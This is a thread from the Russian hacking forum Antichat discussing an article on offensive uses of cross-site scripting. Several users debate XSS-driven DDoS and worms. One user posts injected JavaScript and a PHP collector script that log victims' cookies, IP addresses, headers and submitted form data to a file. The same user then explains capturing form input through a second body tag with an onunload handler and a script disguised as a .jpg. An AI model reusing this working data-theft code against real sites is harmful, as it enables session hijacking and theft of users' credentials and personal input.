Форум АНТИЧАТ - Темная сторона Xss

Форум АНТИЧАТ (https://forum.antichat.xyz/index.php)

- Авторские статьи (https://forum.antichat.xyz/forumdisplay.php?f=31)

- - Темная сторона Xss (https://forum.antichat.xyz/showthread.php?t=42326)

За статью +, но есть некоторые замечания

Цитата:

Статья уже давно готовилась мной, ее предтече стало ВОТ ЭТО голосование, в котором многие заявили что xss это уязвиость вчеращнего дня, сейчас я попытаюсь опровергнуть это утверждение.

Так и не увидел опровержения утверждения, ничего нового.
Все тоже самое достаточно хорошо и более подробно описано здесь http://forum.antichat.ru/threadedpost386598.html#post386598

Цитата:

Основная масса людей считают что xss может использоваться только для кражи cookies, либо исключительно ради эстетического удовольствия лицезрения красивых окошек с различными надписями))

А сам опять про это пишешь...
Да, кстати, а что есть светлая сторона xss? ;)

Цитата:

Сообщение от Isis

Ничего нового не узнал...
Про ддос вообще бред...сколько же надо лохов найти =\
Да и все что здесь написано также можно найти с помощью поиска

про ддос через xss это не бред. В свое время один человек запустил такую штуку на mail.ru . Т е там был xss скрипт полсле открытия письма которые рассылался по контактам и плюс создавал кучу конетков к сайту. В то время кстати мне пришлось доказывать маил ру что это вирус.

а что такое по-твоему xss-вектор? мне кажется ты нескольно неверно уяснил для себя значение этого слова..

насчет ддос - это не бред, я как-то хотел раскрутить один сайтик и немного не расчитав, ненадолго убил его.. )
кстати, с помощью xss ведь можно устроить и просто дос-атаку..

Как я понимаю, xss вектор- это непосредственно яваскрипт код, который выполняется в браузере жертвы, т.е
<script>alert('xss')</script> - alert('xss')- xss вектор

Цитата:

Про ддос вообще бред...

Вообще то про ддос - это не бред, это реально но ее воплотить будет трудновато.

вообще то ДДос реализовать проще чем можно подумть на первый взгляд, особенно если xss на более менее популярной страничке

xчувак,перезалей видео плз,я никак не вьезжаю=)буду благадарен

И все же вопрос про XMLHttpRequest. про то что работа с удаленным сервером не получится - это понятно. но ни как не могу понять как получить пост и гет. куки и $_SERVER передаются, а вот пост и гет ну ни как. подскажите что нужно дополнить в код

Код:

<script type="text/javascript">



function processReqChange() {

    //document.form.state.value = stat(req.readyState); 

 

 

    if (req.readyState == 4) {

      //  clearTimeout(reqTimeout);

 

      //  document.form.statusnum.value = req.status; 

     //   document.form.status.value = req.statusText; 

 

        // only if "OK"

        if (req.status == 200) {

       //     document.form.response.value=req.responseText;

        } else {

            alert("Не удалось получить данные:\n" + req.statusText);

        }}}



function HTTPRequest (url)

{

if (window.XMLHttpRequest){

req = new XMLHttpRequest();

req.onreadystatechange = processReqChange;

req.open("POST" | "GET", url, true);

req.send(null);

}else if (window.ActiveXObject){

req = new

ActiveXObject("Microsoft.XMLHTTP");

if (req){

req.onreadystatechange = processReqChange;

req.open("POST" | "GET", url, true);

req.send();



}

}

return (req.responseText);



}

var XSSCode = HTTPRequest ("pro.php");

</script>



<FORM action="form.php" method="POST">

  <input type="text" name="text">

<input type="submit">

</FORM>

файл php:

Код:

<?php

$time = date("M j G:i:s T Y");

$cook = "";

while (list($key,$value)=each($_COOKIE)) {

 $cook = $cook . $key . ':' . $value . "\n";

 }

$client = "=====================" . $time . "========================== \n

Client ip: ". $_SERVER['REMOTE_ADDR'] . "\n

Client dns: ". $_SERVER['REMOTE_HOST'] . "\n

X-Forwarded-for: ". $_SERVER['HTTP_X_FORWARDED_FOR'] . "\n

Via: ". $_SERVER['HTTP_VIA'] . "\n

COOKIE: ". $cook . "\n

-----------------POST DATA--------------------\n";

$xss = $_GET;

$que = "";

$filename = "somefile.txt";

while (list($key,$value)=each($xss)) {

 $que = $que . $key . ':' . $value . "\n";

 }

$pos = $que . "=============================================== \n";

$data = $client . $pos;

//print_r ($xss);

// Если файл существует и в него возможна запись



if ( is_writeable($filename) ) :



// Открыть файл и установить указатель текущей позиции в конец файла



$fh = fopen($filename, "a+");



// Записать содержимое $data в файл



@fwrite($fh, $data);



// Закрыть файл



fclose($fh); else :



print "Could not open Sfilename for writing";



endif; 



?>

Вроде понял где у меня ошибка:
Я думал данные отправленные из формы будут дублированы по XMLHttpRequest, но оказывается нужно явно указывать params. Я правильно понял? то есть теперь необходимо из формы взять данные и вставить в params. А как можно это сделать не модифицируя саму форму? Спасибо и с меня +)

Такс. в общем провел нужный мне аудит, думаю можно рассказать каким образом провел свою xss.
Так как полного раскрытия темы не нашел ни здесь ни в гугле - думаю может кому то еще пригодится, а может кто то подскажет как можно еще более эффективно юзать xmlhttprequest ;) и так
ко всему выше сказанному необходимо получение данных из формы. я использовал объект document.form1.text.value
и вот тут необходимо вызвать действие при сабмите. а модифицировать форму не могу. Пришла на выручку особенность всех браузеров обрабатывать в документе body несколько раз! И таким образом прописав в середине

Код HTML:

</body>

<body onunload="HTTPRequest ('/dirupload/simple.php?')">

<script type="text/javascript" src="/dirupload/script.jpg"></script>

Ну а прояснить все нюансы помгла инфа вот здесь
http://xmlhttprequest.ru/
Полностью доступным языком описан данный объект

ЗЫ
Говорят есть обход ограничения выполнения на локалхосте. но не было времени с этим разобраться.